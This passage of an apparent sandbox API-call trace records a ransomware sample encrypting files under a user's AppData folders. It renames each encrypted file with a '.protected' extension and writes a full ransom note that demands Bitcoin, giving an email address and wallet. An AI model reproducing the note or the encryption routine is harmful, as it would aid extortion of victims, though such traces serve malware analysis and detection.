returned 1 [0093.618] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.618] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.619] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]") returned 75 [0093.619] StrStrW (lpFirst="fwlink[1]", lpSrch=".txt") returned 0x0 [0093.619] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]") returned 75 [0093.619] StrStrW (lpFirst="fwlink[1]", lpSrch=".rar") returned 0x0 [0093.619] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]") returned 75 [0093.619] StrStrW (lpFirst="fwlink[1]", lpSrch=".zip") returned 0x0 [0093.619] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0093.619] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.619] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0093.619] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.620] WriteFile (in: hFile=0x150, 
lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.620] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.620] CloseHandle (hObject=0x150) returned 1 [0093.620] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1].protected") returned 85 [0093.620] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1]"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1].protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1].protected")) returned 1 [0093.621] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.621] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.621] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\RESTORE_FILES.txt") returned 83 [0093.621] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.648] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.648] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0093.648] lstrlenA (lpString="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") returned 684 [0093.648] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 
[0093.649] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.649] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0093.649] CloseHandle (hObject=0x14c) returned 1 [0093.649] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.649] lstrcmpiW (lpString1="6ASVN7J7", lpString2="Windows") returned -1 [0093.649] lstrcmpiW (lpString1="6ASVN7J7", lpString2="Program Files") returned -1 [0093.650] lstrcmpiW (lpString1="6ASVN7J7", lpString2="Program Files (x86)") returned -1 [0093.650] lstrcmpiW (lpString1="6ASVN7J7", lpString2="$Recycle.bin") returned 1 [0093.650] lstrcmpiW (lpString1="6ASVN7J7", lpString2="System Volume Information") returned -1 [0093.650] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7") returned 65 [0093.650] lstrcmpW (lpString1="6ASVN7J7", lpString2=".") returned 1 [0093.650] lstrcmpW (lpString1="6ASVN7J7", lpString2="..") returned 1 [0093.650] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\*") returned 67 [0093.650] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.650] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.650] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.650] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 
[0093.650] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.650] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.650] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\.") returned 67 [0093.650] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.650] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.650] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.650] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.650] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.650] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.650] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.651] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.651] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.651] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.651] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.651] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.651] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\..") returned 68 [0093.651] lstrcmpW (lpString1="..", lpString2=".") 
returned 1 [0093.651] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.651] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.651] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.651] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.651] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.651] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\.." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.651] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.651] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0093.651] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0093.651] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0093.651] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0093.652] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0093.652] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini") returned 77 [0093.652] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0093.652] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0093.652] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.652] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.652] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.652] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini") returned 77 [0093.652] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0093.652] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini") returned 77 [0093.652] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0093.652] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini") returned 77 [0093.652] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0093.653] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0093.653] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.653] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0093.653] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.653] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.654] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.654] CloseHandle (hObject=0x150) returned 1 [0093.654] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini.protected") returned 87 [0093.654] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini.protected")) returned 1 [0093.654] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.654] lstrcmpiW (lpString1="fwlink[1]", lpString2="Windows") returned -1 [0093.654] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files") returned -1 [0093.654] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files (x86)") returned -1 [0093.654] lstrcmpiW (lpString1="fwlink[1]", lpString2="$Recycle.bin") returned 1 [0093.654] lstrcmpiW (lpString1="fwlink[1]", lpString2="System Volume Information") returned -1 [0093.654] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]") returned 75 [0093.655] StrStrIW (lpFirst="fwlink[1]", lpSrch=".protected") returned 0x0 [0093.655] lstrcmpW (lpString1="fwlink[1]", lpString2="RESTORE_FILES.txt") 
returned -1 [0093.655] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.655] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.656] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]") returned 75 [0093.656] StrStrW (lpFirst="fwlink[1]", lpSrch=".txt") returned 0x0 [0093.656] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]") returned 75 [0093.656] StrStrW (lpFirst="fwlink[1]", lpSrch=".rar") returned 0x0 [0093.656] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]") returned 75 [0093.656] StrStrW (lpFirst="fwlink[1]", lpSrch=".zip") returned 0x0 [0093.656] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0093.656] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.656] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0093.656] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, 
lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.656] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.657] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.657] CloseHandle (hObject=0x150) returned 1 [0093.657] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1].protected") returned 85 [0093.657] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1]"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1].protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1].protected")) returned 1 [0093.657] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.657] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.658] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\RESTORE_FILES.txt") returned 83 [0093.658] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.659] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.659] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0093.659] lstrlenA (lpString="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") returned 684 [0093.659] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: 
lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0093.659] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.660] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0093.660] CloseHandle (hObject=0x14c) returned 1 [0093.660] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.660] lstrcmpiW (lpString1="D68G7BIJ", lpString2="Windows") returned -1 [0093.660] lstrcmpiW (lpString1="D68G7BIJ", lpString2="Program Files") returned -1 [0093.660] lstrcmpiW (lpString1="D68G7BIJ", lpString2="Program Files (x86)") returned -1 [0093.660] lstrcmpiW (lpString1="D68G7BIJ", lpString2="$Recycle.bin") returned 1 [0093.660] lstrcmpiW (lpString1="D68G7BIJ", lpString2="System Volume Information") returned -1 [0093.660] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ") returned 65 [0093.660] lstrcmpW (lpString1="D68G7BIJ", lpString2=".") returned 1 [0093.660] lstrcmpW (lpString1="D68G7BIJ", lpString2="..") returned 1 [0093.661] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\*") returned 67 [0093.661] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.661] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.661] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 
[0093.661] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.661] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.661] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.661] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\.") returned 67 [0093.661] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.661] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.661] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.661] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.661] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\." 
(normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.661] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.661] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.661] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.662] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.662] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.662] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.662] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\..") returned 68 [0093.662] lstrcmpW 